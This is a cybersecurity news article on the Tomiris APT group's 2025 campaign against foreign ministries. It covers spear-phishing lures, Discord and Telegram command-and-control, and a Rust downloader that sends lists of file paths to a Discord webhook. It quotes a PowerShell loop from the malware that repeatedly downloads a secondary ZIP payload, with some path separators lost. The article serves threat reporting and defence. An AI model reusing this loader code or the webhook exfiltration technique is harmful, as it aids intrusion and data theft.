The Tomiris hacker group has resurfaced with a sophisticated campaign targeting foreign ministries and government entities worldwide.
Beginning in early 2025, this advanced persistent threat (APT) actor shifted its operational strategy to focus on high-value diplomatic infrastructure.
By leveraging a diverse array of programming languages—including Go, Rust, C/C++, and Python—the group has enhanced its ability to bypass traditional security measures while maintaining a low profile within compromised networks and persistent environments.
These attacks typically commence with precision spear-phishing emails containing password-protected archives.
Attackers frequently disguise malicious executables with double extensions or mislead victims using office document icons, ensuring that the initial infection vector remains obscured.
The passwords for these archives often follow a predictable pattern, such as “min@2025,” yet this simple obfuscation effectively bypasses automated email scanners.
Once executed, these payloads initiate a chain of events designed to establish persistence and deploy further malicious tools and backdoors.
Securelist security analysts noted that Tomiris has increasingly adopted public services like Telegram and Discord for command-and-control (C2) communications.
This tactical evolution allows malicious traffic to blend seamlessly with legitimate network activity, complicating detection efforts and strategies used by security teams.
Furthermore, the group has begun deploying open-source post-exploitation frameworks such as Havoc and AdaptixC2, signaling a move toward more modular and resilient attack chains.
The analysts emphasized that this blend of custom implants and open-source tools makes attribution and mitigation significantly more challenging for defenders.
The Rust Downloader Mechanism
A standout component of this campaign is the previously undocumented Tomiris Rust Downloader. Unlike typical data exfiltration tools, this implant performs targeted reconnaissance by scanning specific drives for sensitive file types, including .pdf, .docx, and .xlsx.
.webp "Tomiris Hacker Group Added New Tools and Techniques to Attack Organizations Globally 3")
Interestingly, it does not immediately steal these files; instead, it compiles a list of file paths and transmits this data to a Discord webhook using a multipart POST request.
The malware employs a “payload_json” field for system information and a “file” field for the path list, ensuring structured data exfiltration.
.webp "Tomiris Hacker Group Added New Tools and Techniques to Attack Organizations Globally 4")
The malware is programmed to avoid detection by ignoring specific directories such as “Program Files,” “Windows,” and “AppData.”
Upon successfully sending the file list, the downloader creates a Visual Basic script (script.vbs) that executes a PowerShell script (script.ps1).
This script contains a loop that attempts to retrieve a secondary payload—often a ZIP archive containing further executables—every minute.
while($true){
try{
$Response = Invoke-WebRequest -Uri $Url -UseBasicParsing
iwr -OutFile $env:Temp1.zip -Uri $dUrl
New-Item -Path $env:TEMPrfolder -ItemType Directory
break
}catch{
Start-Sleep -Seconds 60
}
}This meticulous approach to reconnaissance and staged delivery highlights the group’s intent to remain undetected while systematically identifying high-value data for future exfiltration and exploitation.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
